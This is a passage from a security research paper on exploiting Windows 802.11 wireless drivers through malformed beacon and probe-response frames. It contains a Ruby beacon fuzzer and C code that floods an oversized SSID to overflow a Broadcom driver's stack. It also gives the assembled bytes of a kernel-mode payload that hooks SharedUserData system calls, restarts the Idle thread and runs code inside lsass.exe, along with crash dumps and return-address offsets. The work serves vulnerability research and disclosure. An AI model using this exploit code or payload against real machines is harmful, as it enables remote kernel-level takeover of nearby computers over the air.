Probe Response containing the parameters of the wireless network it serves. Alternatively, the client can specify the SSID it is looking for. In Passive Mode, clients will listen for Beacon requests and read the network parameters from within the beacon. Since both of these methods result in a frame that contains wireless network information, it makes sense for the frame format to be similar. The method chosen by the client is determined by the capabilities of the device and the application using the driver. A beacon frame includes a generic 802.11 header that defines the packet type, source, destination, Basic Service Set ID (BSSID) and other envelope information. Beacons also include a fixed-length header that is composed of a timestamp, beacon interval, and a capabilities field. The fixed-length header is followed by one or more Information Elements (IEs) which are variable-length fields and contain the bulk of the access point information. A probe response frame is almost identical to a beacon frame except that the destination address is set to that of the client whereas beacons set it to the broadcast address. Information elements consist of an 8-bit type field, an 8-bit length field, and up to 255 bytes of data. This type of structure is very similar to the common Type-Length-Value (TLV) form used in many different protocols. Beacon and probe response packets must contain an SSID IE, a Supported Rates IE, and a Channel IE for most wireless clients to process the packet. The 802.11 specification states that the SSID field (the human name for a given wireless network) should be no more than 32 bytes long. However, the maximum length of an information element is 255 bytes long. This leaves quite a bit of room for error in a poorly-written wireless driver. Wireless drivers support a large number of different information element types. The standard even includes support for proprietary, vendor-specific IEs. 3.2) Packet Injection In order to attack a driver's beacon and probe response processing code, a method of sending raw 802.11 frames to the device is needed. Although the ability to send raw 802.11 packets is not a supported feature in most wireless cards, many open-source drivers can be convinced to integrate support with a small patch. A few even support it natively. Under the Linux operating system, there is a wide range of hardware and drivers that support raw packet injection. Unfortunately, each driver provides a slightly different interface for accessing this feature. To support many different wireless cards, a hardware-independent method for sending raw 802.11 frames is needed. The solution is the LORCON library (Loss of Radio Connectivity), written by Mike Kershaw and Joshua Wright. This library provides a standardized interface for sending raw 802.11 packets through a variety of supported drivers. However, this library is written in C and does not expose any Ruby bindings by default. To make it possible to interact with this library from Ruby, a new Ruby extension (ruby-lorcon) was created that interfaces with the LORCON library and exposes a simple object-oriented interface. This wrapper interface makes it possible to send arbitrary wireless packets from a Ruby script. The easiest way to call the ruby-lorcon interface from a Metasploit module is through a mixin. Mixins are used in the 3.0 version of the Metasploit Framework to improve code reuse and allow any module to import a rich feature set simply by including the right mixins. The mixin that exists for LORCON provides three new user options and a simple API for opening the interface, sending packets, and changing the channel. +-----------+----------+----------+--------------------------------------------+ | Name | Default | Required | Description | +-----------+----------+----------+--------------------------------------------+ | CHANNEL | 11 | yes | The default channel number | | DRIVER | madwifi | yes | The name of the wireless driver for lorcon | | INTERFACE | ath0 | yes | The name of the wireless interface | +-----------+----------+----------+--------------------------------------------+ A Metasploit module that wants to send raw 802.11 packets should include the Msf::Exploit::Lorcon mixin. When this mixin is used, a module can make use of wifi.open() to open the interface and wifi.write() to send packets. The user will specify the INTERFACE and DRIVER options for their particular hardware and driver. The creation of the 802.11 packet itself is left in the hands of the module developer. 3.3) Vulnerability Discovery One of the fastest ways to find new flaws is through the use of a fuzzer. In general terms, a fuzzer is a program that forces an application to process highly variant data that is typically malformed in the hopes that one of the attempts will yield a crash. Fuzzing a wireless device driver depends on the device being in a state where specific frames are processed and a tool that can send frames likely to cause a crash. In the first part of this chapter, the authors described the default state of a wireless client and what types of management frames are processed in this state. The two types of frames that this paper will focus on are Beacons and Probe Responses. These frames have the following structure: +------+----------------------+ | Size | Description | +------+----------------------+ | 1 | Frame Type | | 1 | Frame Flags | | 2 | Duration | | 6 | Destination | | 6 | Source | | 6 | BSSID | | 2 | Sequence | | 8 | Timestamp | | 2 | Beacon Interval | | 2 | Capability Flags | | Var | Information Elements | | 2 | Frame Checksum | +------+----------------------+ The Information Elements field is a list of variable-length structures consisting of a one byte type field, a one byte length field, and up to 255 bytes of data. Variable-length fields are usually good targets for fuzzing since they require special processing when the packet is parsed. To attack a driver that uses Passive Mode to discover wireless networks, it's necessary to flood the target with mangled Beacons. To attack a driver that uses Active Mode, it's necessary to flood the target with mangled Probe Responses while forcing it to scan for networks. The following Ruby code generates a Beacon frame with randomized Information Element data. The Frame Checksum field is automatically added by the driver and does not need to be included. # # Generate a beacon frame with random information elements # # Maximum frame size (max is really 2312) mtu = 1500 # Number of information elements ies = rand(1024) # Randomized SSID ssid = Rex::Text.rand_text_alpha(rand(31)+1) # Randomized BSSID bssid = Rex::Text.rand_text(6) # Randomized source src = Rex::Text.rand_text(6) # Randomized sequence seq = [rand(255)].pack('n') # Capabiltiies cap = Rex::Text.rand_text(2) # Timestamp tstamp = Rex::Text.rand_text(8) frame = "\x80" + # type/subtype (mgmt/beacon) "\x00" + # flags "\x00\x00" + # duration "\xff\xff\xff\xff\xff\xff" + # dst (broadcast) src + # src bssid + # bssid seq + # seq tstamp + # timestamp value "\x64\x00" + # beacon interval cap # capabilities # First IE: SSID "\x00" + ssid.length.chr + ssid + # Second IE: Supported Rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # Third IE: Current Channel "\x03" + "\x01" + channel.chr # Generate random Information Elements and append them 1.upto(ies) do |i| max = mtu - frame.length break if max < 2 t = rand(256) l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) d = Rex::Text.rand_text(l) frame += t.chr + l.chr + d end While this is just one example of a simple 802.11 fuzzer for a particular frame, much more complicated, state-aware fuzzers could be implemented that make it possible to fuzz other packet handling areas of wireless device drivers. 4) Exploitation After an issue has been identified through the use of a fuzzer or through manual analysis, it's necessary to begin the process of determining a way to reliably gain control of the instruction pointer. In the case of stack-based buffer overflows on Windows, this process is often as simple as determining the offset to the return address and then overwriting it with an address of an instruction that jumps back into the stack. That's the best case scenario, though, and there are often other hurdles that one may have to overcome regardless of whether or not the vulnerability exists in a device driver or in a user-mode program. These hurdles and other factors are what tend to make the process of getting reliable control of the instruction pointer one of the most challenging steps in exploit development. Rather than exhaustively describing all of the problems one could run into, the authors will instead provide illustrations in the form of real world examples included in chapter 5. Assuming reliable control of the instruction pointer can be gained, the development of an exploit typically transitions into its final stage: arbitrary code execution. In user-mode, this stage has been completely automated for most exploit developers. It's become common practice to simply use Metasploit's user-mode payload generator. Kernel-mode payloads, on the other hand, have not seen an integrated solution for producing reliable payloads that can be dropped into any exploit. That's certainly not to say that there hasn't been previous work dealing with kernel-mode payloads, as there definitely has been[2,1], but their form up to now has been one that is not particularly easy to adopt. This lack of easy to use kernel-mode payloads can be seen as one of the major reasons why there has not been a large number of public, reliable kernel-mode exploits. Since one of the goals of this paper is to illustrate how kernel-mode exploits can be written just as easily as user-mode exploits, the authors determined that it was necessary to incorporate the existing set of kernel-mode payload ideas into the 3.0 version of the Metasploit framework where they could be used freely with any future kernel-mode exploits. While this final integration was certainly the end-goal, there were a number of important steps that had to be taken before the integration could occur. The following sections will attempt to provide this background. In section 4.1, details regarding the payload architecture that the authors selected is described in detail. This section also includes a description of the interface that has been exposed in the 3.0 version of the Metasploit Framework for developers who wish to implement kernel-mode exploits. 4.1) Payload Architecture The payload architecture that the authors decided to integrate was based heavily off previous research[1]. As was alluded to in the introduction, there are a number of complicated considerations that must be taken into account when dealing with kernel-mode exploitation. A large majority of these considerations are directly related to what methods should be used when executing arbitrary code in the kernel. For example, if a device driver was holding a lock at the time that an exploit was triggered, what might be the best way to go about releasing that lock so as to recover the system so that it will still be possible to interact with it in a meaningful way? Other types of considerations include things like IRQL restrictions, cleaning up corrupted structures, and so on. These considerations lead to there being many different ways in which a payload might best be implemented for a particular vulnerability. This is quite a bit different from the user-mode environment where it's almost always possible to use the exact same payload regardless of the application. Though these situational complications do exist, it is possible to design and implement a payload system that can be applied in almost any circumstance. By separating kernel-mode payloads into variable components, it becomes possible to combine components together in different ways to form functional variations that are best suited for particular situations. In Windows Kernel-mode Payload Fundamentals [1], kernel-mode payloads are broken down into four different components: migration, stagers, recovery, and stages. When describing kernel-mode payloads in terms of components, the migration component would be one that is used to migrate from an unsafe execution environment to a safe execution environment. For example, if the IRQL is at DISPATCH when a vulnerability is triggered, it may be necessary to migrate to a safer IRQL such as PASSIVE. It is not always necessary to have a migration component. The purpose of a stager component is to move some portion of the payload so that it executes in the context of another thread context. This may be necessary if the current thread is of critical importance or may lead to a deadlock of the system should certain operations be used. The use of a stager may obviate the need for a migration component. A recovery component is something that is used to restore the system to clean state and then continue execution. This component is generally one that may require customization for a given vulnerability as it may not always be possible to describe the steps needed to recover the system in a generic way. For example, if locks were held at the time that the vulnerability was triggered, it may be necessary to find a way to release those locks and then continue execution from a safe point. Finally, the stage component is a catch-all for whatever arbitrary code may be executed once the payload is running in a safe environment. This model for describing kernel-mode payloads is what the authors decided to adopt. To better understand how this model works, it seems best to describe how it was applied for all three real world vulnerabilities that are shown in chapter 5. These three vulnerabilities actually make use of the same basic underlying payload, which will henceforth be referred to as ``the payload'' for brevity. The payload itself is composed of three of the four components. Each of the payload components will be discussed individually and then as a whole to provide an idea for how the payload operates. The first component that exists in the payload is a stager component. The stager that the authors chose to use is based on the SharedUserData SystemCall Hook stager described in [1]. Before understanding how the stager works, it's important to understand a few things. As the name implies, the stager accomplishes its goal by hooking the SystemCall attribute found within SharedUserData. As a point of reference, SharedUserData is a global page that is shared between user-mode and kernel-mode. It acts as a sort of global structure that contains things like tick count and time information, version information, and quite a few other things. It's extremely useful for a few different reasons, not the least of which being that it's located at a fixed address in user-mode and in kernel-mode on all NT derivatives. This means that the stager is instantly portable and doesn't need to perform any symbol resolution to locate the address, thus helping to keep the overall size of the payload small. The SystemCall attribute that is hooked is part of an enhancement that was added in Windows XP. This enhancement was designed to make it possible to use optimized system call instructions depending on what hardware support is present on a given machine. Prior to Windows XP, system calls were dispatched from user-mode through the hardcoded use of the int 0x2e soft interrupt. Over time, hardware enhancements were made to decrease the overhead involved in performing a system call, such as through the introduction of the sysenter instruction. Since Microsoft isn't in the business of providing different versions of Windows for different makes and models of hardware, they decided to determine at runtime which system call interface to use. SharedUserData was the perfect candidate for storing the results of this runtime determination as it was already a shared page that existed in every user-mode process. After making these modifications, ntdll.dll was updated to dispatch system calls through SharedUserData rather than through the hardcoded use of int 0x2e. The initial implementation of this new system call dispatching interface placed executable code within the SystemCall attribute of SharedUserData. Subsequent versions of Windows, such as XP SP2, turned the SystemCall attribute into a function pointer. One important implication about the introduction of the SystemCall attribute to SharedUserData is that it represents a pivot point through which all system call dispatching occurs in user-mode. In previous versions of Windows, each user-mode system call stub routine invoked int 0x2e directly. In the latest versions, these stub routines make indirect calls through the SystemCall function pointer. By default, this function pointer is initialized to point to one of a few exported symbols within ntdll.dll. However, the implications of this function pointer being changed to point elsewhere mean that it would be possible to intercept all system calls within all processes. This implication is what forms the very foundation for the stager that is used by the payload. When the stager begins executing, it's running in kernel-mode in the context of the thread that triggered the vulnerability. The first action it takes is to copy a chunk of code (the stage) into an unused portion of SharedUserData using the predictable address of 0xffdf037c. After the copy operation completes, the stager proceeds by hooking the SystemCall attribute. This hook must be handled differently depending on whether or not the target operating system is pre-XP SP2 or not. More details on how this can be handled are described in [1]. Regardless of the approach, the SystemCall attribute is redirected to point to 0x7ffe037c. This predictable location is the user-mode accessible address of the unused portion of SharedUserData where the stage was copied into. After the hooking operation completes, all system calls invoked by user-mode processes will first go through the stage placed at 0x7ffe037c. The stager portion of the payload looks something like this (note, this implementation is only designed to work on XP SP2 and Windows 2003 Server SP1. Modifications would need to be made to make it work on previous versions of XP and 2003): ; Jump/Call to get the address of the stage 00000000 EB38 jmp short 0x3a 00000002 BB0103DFFF mov ebx,0xffdf0301 00000007 4B dec ebx 00000008 FC cld ; Copy the stage into 0xffdf037c 00000009 8D7B7C lea edi,[ebx+0x7c] 0000000C 5E pop esi 0000000D 6AXX push byte num_stage_dwords 0000000F 59 pop ecx 00000010 F3A5 rep movsd ; Set edi to the address of the soon-to-be function pointer 00000012 BF7C03FE7F mov edi,0x7ffe037c ; Check to make sure the hook hasn't already been installed 00000017 393B cmp [ebx],edi 00000019 7409 jz 0x24 ; Grab SystemCall function pointer 0000001B 8B03 mov eax,[ebx] 0000001D 8D4B08 lea ecx,[ebx+0x8] ; Store the existing value in 0x7ffe0308 00000020 8901 mov [ecx],eax ; Overwrite the existing function pointer and make things live! 00000022 893B mov [ebx],edi ; recovery stub here 0000003A E8C3FFFFFF call 0x2 ; stage here With the hook in place, the stager has completed its primary task which was to copy a stage into a location where it could be executed in the future. Before the stage can execute, the stager must allow the recovery component of the payload to execute. As mentioned previously, the recovery component represents one of the most vulnerability-specific portions of any kernel-mode payload. For the purpose of the exploits described in chapter 5, a special purpose recovery component was necessary. This particular recovery component was required due to the fact that the example vulnerabilities are triggered in the context of the Idle thread. On Windows, the Idle thread is a special kernel thread that executes whenever a processor is idle. Due to the nature of the way the Idle thread operates, it's dangerous to perform operations like spinning the thread or any of the other recovery methods described in [1]. It may also be possible to apply the technique for delaying execution within the Idle thread as discussed in [2]. The recovery method that was finally selected involves two basic steps. First, the IRQL for the current processor is restored to DISPATCH level just in case it was executing at a higher IRQL. Second, execution control is transferred into the first instruction of nt!KiIdleLoop after initializing registers appropriately. The end effect is that the idle thread begins executing all over again and, if all goes well, the system continues operating as if nothing had happened. In practice, this recovery method has been proven reliable. However, the one negative that it is has is that it requires knowledge of the address that nt!KiIdleLoop resides at. This dependence represents an area that is ripe for future improvement. Regardless of limitations, the recovery component for the payload looks like the code below: ; Restore the IRQL 00000024 31C0 xor eax,eax 00000026 64C6402402 mov byte [fs:eax+0x24],0x2 ; Initialize assumed registers 0000002B 8B1D1CF0DFFF mov ebx,[0xffdff01c] 00000031 B827BB4D80 mov eax,0x804dbb27 00000036 6A00 push byte +0x0 ; Transfer control to nt!KiIdleLoop 00000038 FFE0 jmp eax After the recovery component has completed its execution, all of the payload code that was originally executing in kernel-mode is complete. The final portion of the payload that remains to be executed is the stage that was copied by the stager. The stage itself runs in user-mode within all process contexts, and it executes every time a system call is dispatched. The implications of this should be obvious. Having a stage that executes within every process every time a system call occurs is just asking for trouble. For that reason, it makes sense to design a generic user-mode stage that can be used to limit the times that it executes to one particular context. The approach that the authors took to meet this requirement is as follows. First, the stage performs a check that is designed to see if it is running in the context of a specific process. This check is there in order to help ensure that the stage itself only executes in a known-good environment. As an example, it would be a shame to take advantage of a kernel-mode vulnerability only to finally execute code with the privileges of Guest. By default, this check is designed to see if the stage is running within lsass.exe, a process that runs with SYSTEM level privileges. If the stage is running within lsass, it performs a check to see if the SpareBool attribute of the Process Environment Block has been set to one. By default, this value is initialized to zero in all processes. If the SpareBool attribute is set to zero, then the stage proceeds to set the SpareBool attribute to one and then finishes by executing whatever code is remaining within the stage. If the SpareBool attribute is set to one, which means the stage has already run, or it's not running within lsass, it transfers control back to the original system call dispatching routine. This is necessary because it is still a requirement that system calls from user-mode processes be dispatched appropriately, otherwise the system itself would grind to a halt. An example of what this stage might look like is shown below: ; Preserve the calling environment 0000003F 60 pusha 00000040 6A30 push byte +0x30 00000042 58 pop eax 00000043 99 cdq 00000044 648B18 mov ebx,[fs:eax] ; Check if Peb->Ldr is NULL 00000047 39530C cmp [ebx+0xc],edx 0000004A 7426 jz 0x72 ; Extract Peb->ProcessParameters->ImagePathName.Buffer 0000004C 8B5B10 mov ebx,[ebx+0x10] 0000004F 8B5B3C mov ebx,[ebx+0x3c] ; Add 0x28 to the image path name (skip past c:\windows\system32\) 00000052 83C328 add ebx,byte +0x28 ; Compare the name of the executable with lass 00000055 8B0B mov ecx,[ebx] 00000057 034B03 add ecx,[ebx+0x3] 0000005A 81F96C617373 cmp ecx,0x7373616c ; If it doesn't match, execute the original system call dispatcher 00000060 7510 jnz 0x72 00000062 648B18 mov ebx,[fs:eax] 00000065 43 inc ebx 00000066 43 inc ebx 00000067 43 inc ebx ; Check if Peb->SpareBool is 1, if it is, execute the original ; system call dispatcher 00000068 803B01 cmp byte [ebx],0x1 0000006B 7405 jz 0x72 ; Set Peb->SpareBool to 1 0000006D C60301 mov byte [ebx],0x1 ; Jump into the continuation stage 00000070 EB07 jmp short 0x79 ; Restore the calling environment and execute the original system call ; dispatcher that was preserved in 0x7ffe0308 00000072 61 popa 00000073 FF250803FE7F jmp near [0x7ffe0308] ; continuation of the stage The culmination of these three payload components is a functional payload that can be used in any situation where an exploit is triggered within the Idle thread. If the exploit is triggered outside of the context of the Idle thread, the recovery component can be swapped out with an alternative method and the rest of the payload can remain unchanged. This is one of the benefits of breaking kernel-mode payloads down into different components. To recap, the payload works by using a stager to copy a stage into an unused portion of SharedUserData. The stager then points the SystemCall attribute to that unused portion, effectively causing all user-mode processes to bounce through the stage when they attempt to make a system call. Once the stager has completed, the recovery component restores the IRQL to DISPATCH and then restarts the Idle thread. The kernel-mode portion of the payload is then complete. Shortly after that, the stage that was copied to SharedUserData is executed in the context of a specific user-mode process, such as lsass.exe. Once this occurs, the stage sets a flag that indicates that it's been executed and completes. All told, the payload itself is only 115 bytes, excluding any additional code in the stage. Given all of this infrastructure work, it's trivial to plug almost any user-mode payload into the stage. The additional code must simply be placed at the point where it's verified that it's running in a particular process and that it hasn't been executed before. The reason for it being so trivial was quite intentional. One of the major goals in implementing this payload system was to make it possible to use the existing set of payloads that exist in the Metasploit framework in conjunction with any kernel-mode exploit. This includes even some of the more powerful payloads such as Meterpreter and VNC injection. There were two key elements involved in integrating kernel-mode payloads into the 3.0 version of the Metasploit Framework. The first had to do with defining the interface that exploit developers would need to use when writing kernel-mode exploits. The second delt with defining the interface the end-users would have to be aware of when using kernel-mode exploits. In terms of precedence, defining the programming level interfaces first is the ideal approach. To that point, the programming interface that was decided upon is one that should be pretty easy to use. The majority of the complexity involved in selecting a kernel-mode payload is hidden from the developer. There are only a few basic things that the developer needs to be aware of. When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to include the Msf::Exploit::KernelMode mixin. This mixin provides hints to the framework that make it aware of the fact that any payloads used with this exploit will need to be appropriately encapsulated within a kernel-mode stager. With this simple action, the majority of the work associated with the kernel-mode payload is abstracted away from the developer. The only other elements that a developer may need to deal with is the process of defining extended parameters that are used to further control the process of selecting different aspects of the kernel-mode payload. These controlable parameters are exposed to developers through the ExtendedOptions hash element in an exploit's global or target-specific Payload options. An example of what this might look like within an exploit can be seen here: 'Payload' => { 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'Recovery' => 'idlethread_restart', 'KiIdleLoopAddress' => 0x804dbb27, } } In the above example, the exploit has explicitly selected the underlying stager component that should be used by specifying the Stager hash element. The sudsyscallhook stager is a symbolic name for the stager that was described in section 4.1. The example above also has the exploit explicitly selecting the recovery component that should be used. In this case, the recovery component that is selected is idlethreadrestart which is a symbolic name for the recovery component described previously. Additionally, the nt!KiIdleLoop address is specified for use with this particular recovery component. Under the hood, the use of the KernelMode mixin and the additional extended options results in the framework encapsulating whatever user-mode payload the end-user specified inside of a kernel-mode stager. In the end, this process is entirely transparent to both the developer and the end-user. While the set of options that can be specified in the extended options hash will surely grow in the future, it makes sense to at least document the set of defined elements at the time of this writing. These options include: Recovery: Defines the recovery component that should be used when generating the kernel-mode payload. The current set of valid values for this option include spin, which will spin the current thread, idlethreadrestart, which will restart the Idle thread, or default which is equivalent to spin. Over time, more recovery methods may be added. These can be found in recovery.rb. RecoveryStub: Defines a custom recovery component. Stager: Defines the stager component that should be used when generating the kernel-mode payload. The current set of valid values for this option include sudsyscallhook. Over time, more stager methods may be added. These can be found in stager.rb. UserModeStub: Defines the user-mode custom code that should be executed as part of the stage. RunInWin32Process: Currently only applicable to the sudsyscallhook stager. This element specifies the name of the system process, such as lsass.exe, that should be injected into. KiIdleLoopAddress: Currently only applicable to the idlethreadrestart recovery component. This element specifies the address of nt!KiIdleLoop. While not particularly important to developers or end-users, it may be interesting for some to understand how this abstraction works internally. To start things off, the KernelMode mixin overrides a base class method called encodebegin. This method is called when a payload that is used by an exploit is being encoded. When this happens, the mixin declares a procedure that is called by the payload encoder. In turn, this procedure is called by the payload encoder in the context of encapsulating the pre-encoded payload. The procedure itself is passed the original raw user-mode payload and the payload options hash (which contains the extended options, if any, that were specified in the exploit). It uses this information to construct the kernel-mode stager that is used to encapsulate the user-mode payload. If the procedure completes successfully, it returns a non-nil buffer that contains the original user-mode payload encapsulated within a kernel-mode stager. The kernel-mode stager and other components are actually contained within the payloads subsystem of the Rex library under lib/rex/payloads/win32/kernel. 5) Case Studies This chapter describes three separate vulnerabilities that were found by the authors in real world 802.11 wireless device drivers. These three issues were found through a combination of fuzzing and manual analysis. 5.1) BroadCom The first vulnerability that was subject to the process described in this paper was an issue that was found in BroadCom's wireless device driver. This vulnerability was discovered by Chris Eagle as a result of his interest in doing some reversing of kernel-mode code. Chris noticed what appeared to be a conventional stack overflow in the way the BroadCom device driver handled beacon packets. As a result of this tip, a simple program was written that generated beacon packets with overly sized SSIDs. The code that was used to do this is shown below: int main(int argc, char **argv) { Packet_80211 BeaconPacket; CreatePacketForExploit(BeaconPacket, basic_target); printf("Looping forever, sending packets.\n"); while(true) { int ret = Send80211Packet(&in_tx, BeaconPacket); usleep(cfg.usleep); if (ret == -1) { printf("Error tx'ing packet. Is interface up?\n"); exit(0); } } } void CreatePacketForExploit(Packet_80211 &P, struct target T) { Packet_80211_mgmt Beacon; u_int8_t bcast_addy[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; Packet_80211_mgmt_Crafter MgmtCrafter(bcast_addy, cfg.src, cfg.bssid); MgmtCrafter.craft(8, Beacon); // 8 = beacon P = Beacon; printf("\n"); if (T.payload_size > 255) { printf("invalid target. payload sizes > 255 wont fit in a single IE\n"); exit(0); } u_int8_t fixed_parameters[12] = { '_', ',', '.', 'j', 'c', '.', ',', '_', // timestamp (8 bytes) 0x64, 0x00, // beeacon interval, 1.1024 secs 0x11, 0x04 // capability information. ESS, WEP, Short slot time }; P.AppendData(sizeof(fixed_parameters), fixed_parameters); u_int8_t SSID_ie[257]; //255 + 2 for type, value u_int8_t *SSID = SSID_ie + 2; SSID_ie[0] = 0; SSID_ie[1] = 255; memset(SSID, 0x41, 255); //Okay, SSID IE is ready for appending. P.AppendData(sizeof(SSID_ie), SSID_ie); P.print_hex_dump(); } As a result of running this code, 802.11 beacon packets were produced that did indeed contain overly sized SSIDs. However, these packets appeared to have no effect on the BroadCom device driver. After considerable head scratching, a modification was made to the program to see if a normally sized SSID would cause the device driver to process it. If it were processed, it would mean that the fake SSID would show up in the list of available networks. Even after making this modification, the device driver still did not appear to be processing the manually crafted 802.11 beacon packets. Finally, it was realized that the driver might have some checks in place such that it would only process beacon packets from networks that also respond to 802.11 probes. To test this theory out, the code was changed in the manner shown below: CreatePacketForExploit(BeaconPacket, basic_target); //CreatePacket returns a beacon, we will also send out directd probe responses. Packet_80211 ProbePacket = BeaconPacket; ProbePacket.wlan_header->subtype = 5; //probe response. ProbePacket.setDstAddr(cfg.dst); ... while(true) { int ret = Send80211Packet(&in_tx, BeaconPacket); usleep(cfg.usleep); ret = Send80211Packet(&in_tx, ProbePacket); usleep(2*cfg.usleep); } Sending out directed probe responses as well as beacon packets caused results to be generated immediately. When a small SSID was sent, it would suddenly show up in the list of available wireless networks. When an overly sized SSID was sent, it resulted in a much desired bluescreen as a result of the stack overflow that Chris had identified. The following output shows some of the crash information associated with transmitting an SSID that consisted of 255 0xCC's: DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: ccccfe9d, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: f6e713de, address which referenced memory ... TRAP_FRAME: 80550004 -- (.trap ffffffff80550004) ErrCode = 00000000 eax=cccccccc ebx=84ce62ac ecx=00000000 edx=84ce62ac esi=805500e0 edi=84ce6308 eip=f6e713de esp=80550078 ebp=805500e0 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 bcmwl5+0xf3de: f6e713de f680d131000002 test byte ptr [eax+31D1h],2 ds:0023:ccccfe9d=?? ... kd> k v *** Stack trace for last set context - .thread/.cxr resets it ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 805500e0 cccccccc cccccccc cccccccc cccccccc bcmwl5+0xf3de 80550194 f76a9f09 850890fc 80558e80 80558c20 0xcccccccc 805501ac 804dbbd4 850890b4 850890a0 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo]) 805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0]) 805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 (FPO: [0,0,0]) In this case, the crash occurred because a variable on the stack was overwritten that was subsequently used as a pointer. This overwritten pointer was then dereferenced. In this case, the dereference occurred through the eax register. Although the crash occurred as a result of the dereference, it's important to note that the return address for the stack frame was successfully overwritten with a controlled value of 0xcccccccc. If the function had been allowed to return cleanly without trying to dereference corrupted pointers, full control of the instruction pointer would have been obtained. In order to avoid this crash and gain full control of the instruction pointer, it's necessary to try to calculate the offset to the return address from the start of the buffer that is being transmitted. Figuring out this offset also has the benefit of making it possible to figure out the minimum number of bytes necessary to transmit to trigger the overflow. This is important because it may be useful when it comes to preventing the dereference crash that was seen previously. There are many different ways in which the offset of the return address can be determined. In this situation, the simplest way to go about it is to transmit a buffer that contains an incrementing array of bytes. For instance, byte index 0 is 0x00, byte index 1 is 0x01, and so on. The value that the return address is overwritten with will then make it possible to calculate its offset within the buffer. After transmitting a packet that makes use of this technique, the following crash is rendered: DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: 605f902e, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: f73673de, address which referenced memory ... STACK_TEXT: 80550004 f73673de badb0d00 84d8b250 80550084 nt!KiTrap0E+0x233 WARNING: Stack unwind information not available. Following frames may be wrong. 805500e0 5c5b5a59 605f5e5d 64636261 68676665 bcmwl5+0xf3de 80550194 f76a9f09 84e9e0fc 80558e80 80558c20 0x5c5b5a59 805501ac 804dbbd4 84e9e0b4 84e9e0a0 00000000 NDIS!ndisMDpcX+0x21 805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 From this stack trace, it can be seen that the return address was overwritten with 0x5c5b5a59. Since byte-ordering on x86 is little endian, the offset within the buffer that contains the SSID is 0x59. With knowledge of the offset at which the return address is overwritten, the next step becomes figuring out where in the buffer to place the arbitrary code that will be executed. Before going down this route, it's important to provide a little bit of background on the format of 802.11 Management packets. Management packets encode all of their information in what the standard calls Information Elements (IEs). IEs have a one byte identifier followed by a one byte length which is subsequently followed by the associated IE data. For those familiar with Type-Length-Value (TLV), IEs are roughly the same thing. Based on this definition, the largest possible IE is 257 bytes (2 bytes of overhead, and 255 bytes of data). The upshot of the size restrictions associated with an IE means that the largest possible SSID that can be copied to the stack is 255 bytes. When attempting to find the offset of the return address on the stack, an SSID IE was sent with a 255 byte SSID. Considering the fact that a stack overflow occurred, one might reasonably expect to find the entire 255 byte SSID on the stack as a result of the overflow that occurred. A quick dump of the stack can be used to validate this assumption: kd> db esp L 256 80550078 2e f0 d9 84 0c 80 d8 84-00 80 d8 84 00 07 0e 01 ................ 80550088 02 03 ff 00 01 02 03 04-05 06 07 08 09 0a 0b 0c ................ 80550098 0d 0e 0f 10 11 12 13 14-15 16 17 18 19 1a 1b 1c ................ 805500a8 1d 1e 1f 20 21 22 23 24-25 26 0b 28 0c 00 00 00 ... !"#$%&.(.... 805500b8 82 84 8b 96 24 30 48 6c-0c 12 18 60 44 00 55 80 ....$0Hl...`D.U. 805500c8 3d 3e 3f 40 41 42 43 44-45 46 01 02 01 02 4b 4c =>?@ABCDEF....KL 805500d8 4d 01 02 50 51 52 53 54-55 56 57 58 59 5a 5b 5c M..PQRSTUVWXYZ[\ 805500e8 5d 5e 5f 60 61 62 63 64-65 66 67 68 69 6a 6b 6c ]^_`abcdefghijkl 805500f8 6d 6e 6f 70 71 72 73 74-75 76 77 78 79 7a 7b 7c mnopqrstuvwxyz{| 80550108 7d 7e 7f 80 81 82 83 84-85 86 87 88 89 8a 8b 8c }~.............. 80550118 8d 8e 8f 90 91 92 93 94-95 96 97 98 99 9a 9b 9c ................ 80550128 9d 9e 9f a0 a1 a2 a3 a4-a5 a6 a7 a8 a9 aa ab ac ................ 80550138 ad ae af b0 b1 b2 b3 b4-b5 b6 b7 b8 b9 ba bb bc ................ 80550148 bd be bf c0 c1 c2 c3 c4-c5 c6 c7 c8 c9 ca cb cc ................ 80550158 cd ce cf d0 d1 d2 d3 d4-d5 d6 d7 d8 d9 da db dc ................ 80550168 dd de df e0 e1 e2 e3 e4-e5 e6 e7 e8 e9 ea eb ec ................ 80550178 ed ee ef f0 f1 f2 f3 f4-f5 f6 f7 f8 f9 fa fb fc ................ 80550188 fd fe e9 84 00 00 00 00-e0 9e 6a 01 ac 01 55 80 ..........j...U. Based on this dump, it appears that the majority of the SSID was indeed copied across the stack. However, a large portion of the buffer prior to the offset of the return address has been mangled. In this instance, the return address appears to be located at 0x805500e4. While the area prior to this address appears mangled, the area succeeding it has remained intact. In order to try to prove the possibility of gaining code execution, a good initial attempt would be to send a buffer that overwrites the return address with the address that immediately succeeds it (which will be composed of int3's). If everything works according to plan, the vulnerable function will return into the int3's and bluescreen the machine in a controlled fashion. This accomplishes two things. First, it proves that it is possible to redirect execution into a controllable buffer. Second, it gives a snapshot of the state of the registers at the time that execution control is redirected. The layout of the buffer that would need to be sent to trigger this condition is described in the diagram below: [Padding.......][EIP][payload of int3's] ^ ^ ^ | | \_ Can hold at most 163 bytes of 